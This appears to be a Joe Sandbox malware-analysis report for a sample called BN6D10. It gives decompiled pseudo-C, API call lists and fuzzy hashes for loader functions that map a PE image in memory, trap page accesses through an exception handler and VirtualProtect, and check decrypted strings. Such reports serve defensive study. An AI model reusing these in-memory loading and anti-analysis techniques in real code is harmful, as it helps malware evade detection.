                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.36%

                                                                                                                                        Control-flow Graph

                                                                                                                                        C-Code - Quality: 84%
                                                                                                                                        			E00401D33() {
                                                                                                                                        				char _v28;
                                                                                                                                        				void _v44;
                                                                                                                                        				char _v48;
                                                                                                                                        				void* _v52;
                                                                                                                                        				long _t25;
                                                                                                                                        				void* _t27;
                                                                                                                                        				int _t28;
                                                                                                                                        				void* _t32;
                                                                                                                                        				intOrPtr* _t34;
                                                                                                                                        				signed int _t37;
                                                                                                                                        				void* _t39;
                                                                                                                                        				int _t44;
                                                                                                                                        
                                                                                                                                        				_push(0);
                                                                                                                                        				_push(0x40410c);
                                                                                                                                        				_push(1);
                                                                                                                                        				_push( *0x404104 + 0x405084);
                                                                                                                                        				 *0x404108 = 0xc;
                                                                                                                                        				 *0x404110 = 0; // executed
                                                                                                                                        				L00401ED4(); // executed
                                                                                                                                        				_t37 = 6;
                                                                                                                                        				memset( &_v44, 0, _t37 << 2);
                                                                                                                                        				if(E00401504( &_v44,  &_v28,  *0x404100 ^ 0x408af7e7) == 0) {
                                                                                                                                        					L7:
                                                                                                                                        					_t25 = 0xb;
                                                                                                                                        					L8:
                                                                                                                                        					ExitThread(_t25);
                                                                                                                                        				}
                                                                                                                                        				_t40 = _v28;
                                                                                                                                        				_t27 = E0040184E(_v44, 0, _v28, 0); // executed
                                                                                                                                        				if(_t27 != 0) {
                                                                                                                                        					goto L7;
                                                                                                                                        				}
                                                                                                                                        				_t28 = lstrlenW( *0x4040f8);
                                                                                                                                        				_t9 = _t28 + 2; // 0x2
                                                                                                                                        				_t44 = _t28 + _t9;
                                                                                                                                        				_t12 = _t44 + 8; // 0xa
                                                                                                                                        				_t32 = E0040177C(_t40, _t12,  &_v48,  &_v52); // executed
                                                                                                                                        				if(_t32 == 0) {
                                                                                                                                        					_t39 =  *0x4040f8;
                                                                                                                                        					_t34 = _v52;
                                                                                                                                        					 *_t34 = 0;
                                                                                                                                        					if(_t39 == 0) {
                                                                                                                                        						 *(_t34 + 4) = 0;
                                                                                                                                        					} else {
                                                                                                                                        						memcpy(_t34 + 4, _t39, _t44);
                                                                                                                                        					}
                                                                                                                                        				}
                                                                                                                                        				_t25 = E00401C1F(_v44, _t40); // executed
                                                                                                                                        				goto L8;
                                                                                                                                        			}

                                                                                                                                        APIs
                                                                                                                                        • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(?,00000001,0040410C,00000000), ref: 00401D64
                                                                                                                                        • lstrlenW.KERNEL32(00000000,?,?,?), ref: 00401DAA
                                                                                                                                          • Part of subcall function 0040177C: GetSystemTimeAsFileTime.KERNEL32(?,00000002,00000000,?,?,?,?,?,?,?,?,?,00401DC7,0000000A,?,?), ref: 00401789
                                                                                                                                          • Part of subcall function 0040177C: _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 0040179F
                                                                                                                                          • Part of subcall function 0040177C: _snwprintf.NTDLL ref: 004017C4
                                                                                                                                          • Part of subcall function 0040177C: CreateFileMappingW.KERNELBASE(000000FF,00404108,00000004,00000000,?,?), ref: 004017E9
                                                                                                                                          • Part of subcall function 0040177C: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401DC7,0000000A,?), ref: 00401800
                                                                                                                                          • Part of subcall function 0040177C: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00401DC7,0000000A), ref: 00401835
                                                                                                                                        • memcpy.NTDLL(?,?,00000002,0000000A,?,?), ref: 00401DE1
                                                                                                                                        • ExitThread.KERNEL32 ref: 00401DFE
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.703165162.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 0000000D.00000002.703181808.0000000000407000.00000040.00020000.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_400000_BN6D10.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: DescriptorFileSecurityTime$CloseConvertCreateErrorExitHandleLastMappingStringSystemThread_aulldiv_snwprintflstrlenmemcpy
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2378523637-0
                                                                                                                                        • Opcode ID: 642502e69540b96eaf92f3aa5cfaac2cfe8c9cfa75699ba0caf2f26f917c8ccc
                                                                                                                                        • Instruction ID: 873d5e61fbb9f3543ff472695a2200f585b1c580edcb5926e86469b000962dd2
                                                                                                                                        • Opcode Fuzzy Hash: 642502e69540b96eaf92f3aa5cfaac2cfe8c9cfa75699ba0caf2f26f917c8ccc
                                                                                                                                        • Instruction Fuzzy Hash: 05218E72104201ABD710EB91CD49D9B7BEDEF84304F00493AB655FB1A1EB38E6448B99
                                                                                                                                         Uniqueness Score: 16.53%

                                                                                                                                         Control-flow Graph: rendered graph of basic blocks 4012f7-4013a8 omitted (legend: Executed / Not Executed)
                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E004012F7(void* __ebx, struct _CRITICAL_SECTION* _a4, unsigned int _a8, intOrPtr _a12) {
                                                                                                                                        				int _t23;
                                                                                                                                        				intOrPtr _t26;
                                                                                                                                        				intOrPtr* _t28;
                                                                                                                                        				unsigned int _t32;
                                                                                                                                        				long _t33;
                                                                                                                                        				intOrPtr* _t34;
                                                                                                                                        
                                                                                                                                        				_t32 = _a8 >> 0xc;
                                                                                                                                        				_t34 = E00401A95(0x18);
                                                                                                                                        				if(_t34 == 0) {
                                                                                                                                        					_t33 = 8;
                                                                                                                                        					L11:
                                                                                                                                        					return _t33;
                                                                                                                                        				}
                                                                                                                                        				 *(_t34 + 8) = _t32;
                                                                                                                                        				 *((intOrPtr*)(_t34 + 0x10)) = _a12;
                                                                                                                                        				 *((intOrPtr*)(_t34 + 0x14)) = 0;
                                                                                                                                        				EnterCriticalSection(_a4);
                                                                                                                                        				_t28 = E00401EDA(_a4, _t32);
                                                                                                                                        				if(_t28 == _a4 + 0x18 ||  *((intOrPtr*)(_t28 + 8)) != _t32) {
                                                                                                                                        					_t10 = _t34 + 0xc; // 0xc
                                                                                                                                        					_t23 = VirtualProtect(_a8, 1, 1, _t10); // executed
                                                                                                                                        					if(_t23 == 0) {
                                                                                                                                        						_t33 = GetLastError();
                                                                                                                                        					} else {
                                                                                                                                        						 *((intOrPtr*)(_t34 + 4)) = _t34;
                                                                                                                                        						 *_t34 = _t34;
                                                                                                                                        						_t26 =  *_t28;
                                                                                                                                        						 *_t34 = _t26;
                                                                                                                                        						 *((intOrPtr*)(_t34 + 4)) = _t28;
                                                                                                                                        						 *((intOrPtr*)(_t26 + 4)) = _t34;
                                                                                                                                        						 *_t28 = _t34;
                                                                                                                                        						_t33 = 0;
                                                                                                                                        					}
                                                                                                                                        				} else {
                                                                                                                                        					_t33 = 0xb7;
                                                                                                                                        				}
                                                                                                                                        				LeaveCriticalSection(_a4);
                                                                                                                                        				if(_t33 != 0) {
                                                                                                                                        					E00401F77(_t34);
                                                                                                                                        					if(_t33 == 0xb7) {
                                                                                                                                        						_t33 = 0;
                                                                                                                                        					}
                                                                                                                                        				}
                                                                                                                                        				goto L11;
                                                                                                                                        			}

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00401A95: HeapAlloc.KERNEL32(00000000,?,004021B0,00000028,?,?,00401F0D,?,00000000,?,?,?,0040111D,?,00000000), ref: 00401AA1
                                                                                                                                        • EnterCriticalSection.KERNEL32(00000000,00000000,00000018,?,?,?,0040189B,?,?,00000000,00000000,?,?,?,?,00401F40), ref: 00401327
                                                                                                                                        • VirtualProtect.KERNELBASE(?,00000001,00000001,0000000C,?,?,0040189B,?,?,00000000,00000000,?,?,?,?,00401F40), ref: 00401359
                                                                                                                                        • GetLastError.KERNEL32(?,0040189B,?,?,00000000,00000000,?,?,?,?,00401F40,?,?,00000000,?,00000000), ref: 00401378
                                                                                                                                        • LeaveCriticalSection.KERNEL32(00000000,?,0040189B,?,?,00000000,00000000,?,?,?,?,00401F40,?,?,00000000), ref: 00401383
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.703165162.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                         • Associated: 0000000D.00000002.703181808.0000000000407000.00000040.00020000.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_400000_BN6D10.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$AllocEnterErrorHeapLastLeaveProtectVirtual
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1328245997-0
                                                                                                                                        • Opcode ID: 4f96ea12cab5af2c4a859be03329dbf08eeafb8052589b2756507cc9965101a4
                                                                                                                                        • Instruction ID: d3344fbafa800d09a4fd79cbeb8323f8343f56ef1dfcba6aa456d62b1ed10a1d
                                                                                                                                        • Opcode Fuzzy Hash: 4f96ea12cab5af2c4a859be03329dbf08eeafb8052589b2756507cc9965101a4
                                                                                                                                        • Instruction Fuzzy Hash: B9215C32601704EBEB208F59D840A5ABBE9BF84751F14803BF949EB7A0C778D9418BA5
                                                                                                                                         Uniqueness Score: 1.69%

                                                                                                                                         Control-flow Graph: rendered graph of basic blocks 401226-4012c6 omitted (legend: Executed / Not Executed)
                                                                                                                                        C-Code - Quality: 96%
                                                                                                                                        			E00401226(unsigned int __eax, void* __ecx, struct _CRITICAL_SECTION* _a4, intOrPtr _a8) {
                                                                                                                                        				signed int _v8;
                                                                                                                                        				intOrPtr _t24;
                                                                                                                                        				int _t28;
                                                                                                                                        				long _t29;
                                                                                                                                        				void* _t31;
                                                                                                                                        				signed int _t40;
                                                                                                                                        				signed int _t42;
                                                                                                                                        				void* _t45;
                                                                                                                                        
                                                                                                                                        				_push(__ecx);
                                                                                                                                        				_t31 = __eax;
                                                                                                                                        				_v8 = 0x490;
                                                                                                                                        				_t40 = __eax >> 0xc;
                                                                                                                                        				EnterCriticalSection(_a4);
                                                                                                                                        				_t45 = E00401EDA(_a4, _t40);
                                                                                                                                        				if(_t45 == _a4 + 0x18 ||  *((intOrPtr*)(_t45 + 8)) != _t40) {
                                                                                                                                        					L10:
                                                                                                                                        					LeaveCriticalSection(_a4);
                                                                                                                                        					return _v8;
                                                                                                                                        				} else {
                                                                                                                                        					_t24 =  *((intOrPtr*)(_t45 + 0x14));
                                                                                                                                        					if(_a8 == 0) {
                                                                                                                                        						_t42 = _t40 | 0xffffffff;
                                                                                                                                        						_t24 = _t24 - 1;
                                                                                                                                        					} else {
                                                                                                                                        						_t42 = 1;
                                                                                                                                        					}
                                                                                                                                        					_v8 = _v8 & 0x00000000;
                                                                                                                                        					if(_t24 != 0) {
                                                                                                                                        						L8:
                                                                                                                                        						 *((intOrPtr*)(_t45 + 0x14)) =  *((intOrPtr*)(_t45 + 0x14)) + _t42;
                                                                                                                                        						_t25 =  *(_t45 + 0x10);
                                                                                                                                        						if( *(_t45 + 0x10) != 0) {
                                                                                                                                        							E004018C2(_t31 & 0xfffff000, _t31 & 0xfffff000, _t25);
                                                                                                                                        							 *(_t45 + 0x10) =  *(_t45 + 0x10) & 0x00000000;
                                                                                                                                        						}
                                                                                                                                        						goto L10;
                                                                                                                                        					} else {
                                                                                                                                        						_t10 = _t45 + 0xc; // 0xc
                                                                                                                                        						_t28 = VirtualProtect(_t31, 1,  *_t10, _t10); // executed
                                                                                                                                        						if(_t28 != 0) {
                                                                                                                                        							goto L8;
                                                                                                                                        						}
                                                                                                                                        						_t29 = GetLastError();
                                                                                                                                        						_v8 = _t29;
                                                                                                                                        						if(_t29 != 0) {
                                                                                                                                        							goto L10;
                                                                                                                                        						}
                                                                                                                                        						goto L8;
                                                                                                                                        					}
                                                                                                                                        				}
                                                                                                                                        			}
Instruction addresses (one per decompiled statement; 0x00000000 marks lines with no corresponding instruction): 0x00401229 0x00401230 0x00401234 0x0040123b 0x0040123e 0x0040124d 0x00401257 0x004012b6 0x004012b9 0x004012c6 0x0040125e 0x00401262 0x00401265 0x0040126c 0x0040126f 0x00401267 0x00401269 0x00401269 0x00401270 0x00401276 0x00401298 0x00401298 0x0040129b 0x004012a0 0x004012ad 0x004012b2 0x004012b2 0x00000000 0x00401278 0x00401278 0x00401281 0x00401289 0x00000000 0x00000000 0x0040128b 0x00401293 0x00401296 0x00000000 0x00000000 0x00000000 0x00401296 0x00401276

APIs
• EnterCriticalSection.KERNEL32(?,?,?,?,?,00000000,00401D1A,?,00000000), ref: 0040123E
• VirtualProtect.KERNELBASE(00000000,00000001,0000000C,0000000C,00000000,?,?,?,?,00000000,00401D1A,?,00000000), ref: 00401281
• GetLastError.KERNEL32(?,?,?,?,00000000,00401D1A,?,00000000), ref: 0040128B
• LeaveCriticalSection.KERNEL32(?,00000000,?,?,?,?,00000000,00401D1A,?,00000000), ref: 004012B9
Memory Dump Source
• Source File: 0000000D.00000002.703165162.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.703181808.0000000000407000.00000040.00020000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_BN6D10.jbxd
Similarity
• API ID: CriticalSection$EnterErrorLastLeaveProtectVirtual
• String ID:
• API String ID: 3666628472-0
• Opcode ID: 691570f02f7321f44599c1689d7172c09e9128d7d7b148b450363dad249b82e2
• Instruction ID: 801d6b01a7e1f0d920c2274e07b06c93cab4a8dbfbfe62b4cba8eb1b054a82cf
• Opcode Fuzzy Hash: 691570f02f7321f44599c1689d7172c09e9128d7d7b148b450363dad249b82e2
• Instruction Fuzzy Hash: 5E118132600604EBDB20DF6ADC84B5BBBE8EB45355F10827EE455F32E0D778DA048B64
Uniqueness

Uniqueness Score: 1.69%

Control-flow Graph (rendered as an image; legend: Executed / Not Executed). Basic blocks and edges: 167 401cb1-401cbf 168 401cc1-401cd0 167->168 169 401d2b-401d30 167->169 170 401cd2-401cda call 401226 168->170 171 401cfc-401d02 168->171 175 401cdf-401ce1 170->175 173 401d04-401d11 TlsGetValue 171->173 174 401d2a 171->174 173->174 176 401d13-401d15 call 401226 173->176 174->169 175->174 177 401ce3-401cfa TlsSetValue 175->177 180 401d1a-401d1c 176->180 179 401d27 177->179 179->174 180->174 181 401d1e-401d21 TlsSetValue 180->181 181->179
C-Code - Quality: 100%
			/* Exception handler: _a4 is the EXCEPTION_POINTERS* the OS passes to a vectored or
			   structured exception handler, so *_a4 is the EXCEPTION_RECORD* and *(_a4 + 4) the
			   CONTEXT*. Read together with the subcall E00401226 (EnterCriticalSection /
			   VirtualProtect / LeaveCriticalSection, listed above), this is a page-protection trap:
			   an access violation on a watched page lifts the protection and single-steps the
			   faulting instruction; the single-step exception then restores the protection. */
			#include <windows.h>

			E00401CB1(intOrPtr* _a4) {
				intOrPtr _t8;
				void* _t10;   // not assigned anywhere in the decompiler output (unrecovered register value)
				void* _t11;
				void* _t14;
				intOrPtr _t17;
				intOrPtr* _t18;
				intOrPtr _t19;
				void* _t20;
				intOrPtr* _t22;
				long* _t24;
				signed int _t25;

				_t8 =  *0x404114;                   // global state block; +0x24 holds a TLS index
				_t25 = 0;                           // default return: EXCEPTION_CONTINUE_SEARCH
				_t17 = _t8;
				if(_t8 != 0) {
					_t22 = _a4;
					_t18 =  *_t22;                  // EXCEPTION_RECORD*
					_t19 =  *_t18;                  // ExceptionRecord->ExceptionCode
					if(_t19 != 0xc0000005) {        // STATUS_ACCESS_VIOLATION?
						if(_t19 == 0x80000004) {    // STATUS_SINGLE_STEP: trap flag fired after the retried instruction
							_t24 = _t8 + 0x24;
							if(TlsGetValue( *_t24) != 0) {              // address stashed by the access-violation path
								_t11 = E00401226(_t10, _t18, _t17, 0); // executed: restore the page protection
								if(_t11 == 0) {
									TlsSetValue( *_t24, 0);             // clear the stashed address
									goto L8;
								}
							}
						}
					} else {
						_t20 =  *(_t18 + 0x18);     // ExceptionInformation[1]: the address that faulted
						_t14 = E00401226(_t20, _t18, _t8, 1); // executed: make the page accessible
						if(_t14 == 0) {
							TlsSetValue( *(_t17 + 0x24), _t20);     // remember the address for the single-step path
							// CONTEXT.EFlags (x86 CONTEXT offset 0xc0) |= TF (0x100): single-step the retried instruction
							 *( *((intOrPtr*)(_t22 + 4)) + 0xc0) =  *( *((intOrPtr*)(_t22 + 4)) + 0xc0) | 0x00000100;
							L8:
							_t25 = _t25 | 0xffffffff;   // -1 == EXCEPTION_CONTINUE_EXECUTION
						}
					}
				}
				return _t25;
			}
Instruction addresses (one per decompiled statement; 0x00000000 marks lines with no corresponding instruction): 0x00401cb1 0x00401cb8 0x00401cbd 0x00401cbf 0x00401cc2 0x00401cc6 0x00401cc8 0x00401cd0 0x00401d02 0x00401d04 0x00401d11 0x00401d15 0x00401d1c 0x00401d21 0x00000000 0x00401d21 0x00401d1c 0x00401d11 0x00401cd2 0x00401cd2 0x00401cda 0x00401ce1 0x00401ce7 0x00401cf0 0x00401d27 0x00401d27 0x00401d27 0x00401ce1 0x00401d2a 0x00401d30

APIs
• TlsSetValue.KERNEL32(?,?,?,00000001), ref: 00401CE7
• TlsGetValue.KERNEL32(?), ref: 00401D09
• TlsSetValue.KERNEL32(?,00000000,?,00000000), ref: 00401D21
  • Part of subcall function 00401226: EnterCriticalSection.KERNEL32(?,?,?,?,?,00000000,00401D1A,?,00000000), ref: 0040123E
  • Part of subcall function 00401226: VirtualProtect.KERNELBASE(00000000,00000001,0000000C,0000000C,00000000,?,?,?,?,00000000,00401D1A,?,00000000), ref: 00401281
  • Part of subcall function 00401226: GetLastError.KERNEL32(?,?,?,?,00000000,00401D1A,?,00000000), ref: 0040128B
  • Part of subcall function 00401226: LeaveCriticalSection.KERNEL32(?,00000000,?,?,?,?,00000000,00401D1A,?,00000000), ref: 004012B9
Memory Dump Source
• Source File: 0000000D.00000002.703165162.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.703181808.0000000000407000.00000040.00020000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_BN6D10.jbxd
Similarity
• API ID: Value$CriticalSection$EnterErrorLastLeaveProtectVirtual
• String ID:
• API String ID: 3047629960-0
• Opcode ID: 932defbe4dfdb6a023698938e52c3090d4f8813e82115b7a34d37f4d2a217706
• Instruction ID: 7730d4b12e8f039a8e8941a3efe4d29886179ec9aa220dad361151113ab7cf3e
• Opcode Fuzzy Hash: 932defbe4dfdb6a023698938e52c3090d4f8813e82115b7a34d37f4d2a217706
• Instruction Fuzzy Hash: 3D01F132300008ABE6208F14DE44E2BBBADEF69315F21017AF641F32B1C73AEC408628
Uniqueness

Uniqueness Score: 1.34%

Control-flow Graph (rendered as an image; legend: Executed / Not Executed). Basic blocks and edges: 182 401f8c-401fc3 memcpy 183 401fc5-401fd0 182->183 184 401ffc-40200a call 401b32 182->184 185 401fd3-401fdc 183->185 188 401ff4-401ffa 185->188 189 401fde-401ff1 memcpy 185->189 188->184 188->185 189->188
                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E00401F8C(void* __ecx, void* _a4, void* _a8) {
                                                                                                                                        				signed int _v8;
                                                                                                                                        				void* _t25;
                                                                                                                                        				int _t33;
                                                                                                                                        				signed int _t40;
                                                                                                                                        				signed int _t43;
                                                                                                                                        				void* _t47;
                                                                                                                                        				intOrPtr _t49;
                                                                                                                                        				void* _t52;
                                                                                                                                        				intOrPtr* _t54;
                                                                                                                                        				void* _t55;
                                                                                                                                        				void* _t56;
                                                                                                                                        
                                                                                                                                        				_t47 = _a8;
                                                                                                                                        				_t25 =  *((intOrPtr*)(_t47 + 0x3c)) + _t47;
                                                                                                                                        				_t40 =  *(_t25 + 6) & 0x0000ffff;
                                                                                                                                        				_t49 =  *((intOrPtr*)(_t25 + 0x3c));
                                                                                                                                        				_t52 = ( *(_t25 + 0x14) & 0x0000ffff) + _t25 + 0x18;
                                                                                                                                        				_v8 = _t40;
                                                                                                                                        				memcpy(_a4, _t47,  *(_t25 + 0x54)); // executed
                                                                                                                                        				_t56 = _t55 + 0xc;
                                                                                                                                        				if(_t40 > 0) {
                                                                                                                                        					_t43 =  !(_t49 - 1);
                                                                                                                                        					_t54 = _t52 + 0x14;
                                                                                                                                        					do {
                                                                                                                                        						_t33 =  *((intOrPtr*)(_t54 - 4)) + _t49 - 0x00000001 & _t43;
                                                                                                                                        						if(_t33 != 0) {
                                                                                                                                        							memcpy( *((intOrPtr*)(_t54 - 8)) + _a4,  *_t54 + _a8, _t33); // executed
                                                                                                                                        							_t56 = _t56 + 0xc;
                                                                                                                                        						}
                                                                                                                                        						_t54 = _t54 + 0x28;
                                                                                                                                        						_t21 =  &_v8;
                                                                                                                                        						 *_t21 = _v8 - 1;
                                                                                                                                        					} while ( *_t21 != 0);
                                                                                                                                        				}
                                                                                                                                        				E00401B32(_a4);
                                                                                                                                        				return 0;
			}

Instruction addresses covered by the listing above: 0x00401f90, 0x00401f96, 0x00401f9d, 0x00401fa3, 0x00401fa6, 0x00401fb6, 0x00401fb9, 0x00401fbe, 0x00401fc3, 0x00401fcb, 0x00401fcd, 0x00401fd3, 0x00401fda, 0x00401fdc, 0x00401fec, 0x00401ff1, 0x00401ff1, 0x00401ff4, 0x00401ff7, 0x00401ff7, 0x00401ff7, 0x00401fd3, 0x00401fff, 0x0040200a

                                                                                                                                        APIs
                                                                                                                                        • memcpy.NTDLL(00000000,00000002,?,00000002,?,?,?,?,00401C57,?,?,?,?,?,00000002,00000000), ref: 00401FB9
                                                                                                                                        • memcpy.NTDLL(00000000,00000002,?,00000002,00000000,?,?), ref: 00401FEC
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.703165162.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.703181808.0000000000407000.00000040.00020000.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_400000_BN6D10.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: memcpy
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3510742995-0
                                                                                                                                        • Opcode ID: 26c2a0c01562fe0999569659decf58a21fda16f2b5e82da7da097808fe419233
                                                                                                                                        • Instruction ID: 34ba3f68961694401ee60be4d945655729f24ebafdbe90f0a81fe01ff034e333
                                                                                                                                        • Opcode Fuzzy Hash: 26c2a0c01562fe0999569659decf58a21fda16f2b5e82da7da097808fe419233
                                                                                                                                        • Instruction Fuzzy Hash: 6411657650010AAFCB10DF59CC81DAAB7F8FF04314705806AF90897322D379EA55DB64
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.03%

                                                                                                                                        Control-flow Graph

Basic blocks (node: address range, calls made):
• 190: 40212a-40214d, call 401504
• 193: 4021a1-4021a6
• 194: 40214f-402152
• 195: 402154-402169, call 401030
• 196: 40216b
• 197: 40216d-40216f
• 199: 402190-40219b, HeapFree
• 200: 402171-402189, call 401676, StrStrIA
• 204: 40218b
Edges: 190->193, 190->194, 194->195, 194->196, 195->197, 196->197, 197->199, 197->200, 199->193, 200->199, 200->204, 204->199
                                                                                                                                        C-Code - Quality: 83%
                                                                                                                                        			E0040212A(void* __ecx) {
                                                                                                                                        				void* _v8;
                                                                                                                                        				char _v12;
                                                                                                                                        				char* _t18;
                                                                                                                                        				char* _t25;
                                                                                                                                        				char* _t29;
                                                                                                                                        
                                                                                                                                        				_t22 = __ecx;
                                                                                                                                        				_push(__ecx);
                                                                                                                                        				_push(__ecx);
                                                                                                                                        				_t25 = 0;
                                                                                                                                        				if(E00401504( &_v8,  &_v12,  *0x404100 ^ 0xa49b9761) != 0) {
                                                                                                                                        					if(_v8 == 0) {
                                                                                                                                        						_t29 = 0;
                                                                                                                                        					} else {
                                                                                                                                        						_t29 = E00401030(_t22, _v8,  *0x404100 ^ 0xd3bf9dd7);
                                                                                                                                        					}
                                                                                                                                        					if(_t29 != 0) {
                                                                                                                                        						_v12 = E00401676(_t22) & 0x0000ffff;
                                                                                                                                        						_t18 = StrStrIA(_t29,  &_v12); // executed
                                                                                                                                        						if(_t18 != 0) {
                                                                                                                                        							_t25 = 0x657;
                                                                                                                                        						}
                                                                                                                                        					}
                                                                                                                                        					HeapFree( *0x4040e0, 0, _v8);
                                                                                                                                        				}
                                                                                                                                        				return _t25;
			}

Instruction addresses covered by the listing above: 0x0040212a, 0x0040212d, 0x0040212e, 0x00402144, 0x0040214d, 0x00402152, 0x0040216b, 0x00402154, 0x00402167, 0x00402167, 0x0040216f, 0x00402179, 0x00402181, 0x00402189, 0x0040218b, 0x0040218b, 0x00402189, 0x0040219b, 0x0040219b, 0x004021a6

                                                                                                                                        APIs
                                                                                                                                        • StrStrIA.KERNELBASE(00000000,00000000,?,00000000,?,?,00000000,?,?,?,0040112E,?,00000000), ref: 00402181
                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,00000000,?,?,00000000,?,?,?,0040112E,?,00000000), ref: 0040219B
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.703165162.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.703181808.0000000000407000.00000040.00020000.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_400000_BN6D10.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FreeHeap
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3298025750-0
                                                                                                                                        • Opcode ID: e776918a00ac0aae7ab76bf6413a92192bce559fbea7e8136cda6bef20c6054b
                                                                                                                                        • Instruction ID: 8295fca072fd4b9566d3d3d28dba11e38151ff33bd986980f564396e29b2a5f2
                                                                                                                                        • Opcode Fuzzy Hash: e776918a00ac0aae7ab76bf6413a92192bce559fbea7e8136cda6bef20c6054b
                                                                                                                                        • Instruction Fuzzy Hash: 4101F776A00114BBDB10DBA1EE48EAF7BACAB88740F104177BA01F7290D674CF0187B8
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 10.55%

                                                                                                                                        Control-flow Graph

Basic blocks (node: address range, calls made):
• 205: f664ae-f664c7
• 206: f664c9-f664cb
• 207: f664d2-f664de
• 208: f664cd
• 210: f664e0-f664e6
• 211: f664ee-f664fb, Module32First
• 212: f66504-f6650c
• 213: f664fd-f664fe, call f6616d
• 216: f664e8-f664ec
• 217: f66503
Edges: 205->206, 206->207, 206->208, 207->210, 207->211, 208->207, 210->211, 210->216, 211->212, 211->213, 213->217, 216->206, 216->211, 217->212
                                                                                                                                        APIs
                                                                                                                                        • Module32First.KERNEL32(00000000,00000224), ref: 00F664F6
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.705480067.0000000000F65000.00000040.00000001.sdmp, Offset: 00F65000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_f65000_BN6D10.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FirstModule32
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3757679902-0
                                                                                                                                        • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                        • Instruction ID: f9abb4f261bcd53a4f13cb1a73fe48c8896bc10016870f30f1e591a49ece16cc
                                                                                                                                        • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                        • Instruction Fuzzy Hash: 5BF062359007106BD7206BB5988DA6F76E8AF49734F100529F646D14C0DA74EC455A61
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 2.48%

                                                                                                                                        C-Code - Quality: 86%
                                                                                                                                        			E00401C1F(void* __eax, void* __edx) {
                                                                                                                                        				char _v8;
                                                                                                                                        				void* _v12;
                                                                                                                                        				void* __ebx;
                                                                                                                                        				void* _t17;
                                                                                                                                        				long _t19;
                                                                                                                                        				long _t23;
                                                                                                                                        				long _t25;
                                                                                                                                        				char _t28;
                                                                                                                                        				void* _t31;
                                                                                                                                        				long _t33;
                                                                                                                                        				void* _t35;
                                                                                                                                        				intOrPtr* _t36;
                                                                                                                                        				void* _t38;
                                                                                                                                        
                                                                                                                                        				_t31 = __edx;
                                                                                                                                        				_t35 = __eax;
                                                                                                                                        				_t17 = E004013AB( &_v8,  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) + 0x00000fff & 0xfffff000,  &_v8,  &_v12); // executed
                                                                                                                                        				if(_t17 != 0) {
                                                                                                                                        					_t33 = 8;
                                                                                                                                        					goto L8;
                                                                                                                                        				} else {
                                                                                                                                        					_t28 = _v8;
                                                                                                                                        					_t19 = E00401F8C( &_v8, _t28, _t35); // executed
                                                                                                                                        					_t33 = _t19;
                                                                                                                                        					if(_t33 == 0) {
                                                                                                                                        						_t38 =  *((intOrPtr*)(_t28 + 0x3c)) + _t28;
                                                                                                                                        						_t23 = E0040200D(_t28, _t38); // executed
                                                                                                                                        						_t33 = _t23;
                                                                                                                                        						if(_t33 == 0) {
                                                                                                                                        							_t25 = E004016D0(_t38, _t31, _t28);
                                                                                                                                        							_t33 = _t25;
                                                                                                                                        							if(_t33 == 0) {
                                                                                                                                        								_push(_t25);
                                                                                                                                        								_push(1);
                                                                                                                                        								_push(_t28);
                                                                                                                                        								if( *((intOrPtr*)( *((intOrPtr*)(_t38 + 0x28)) + _t28))() == 0) {
                                                                                                                                        									_t33 = GetLastError();
                                                                                                                                        								}
                                                                                                                                        							}
                                                                                                                                        						}
                                                                                                                                        					}
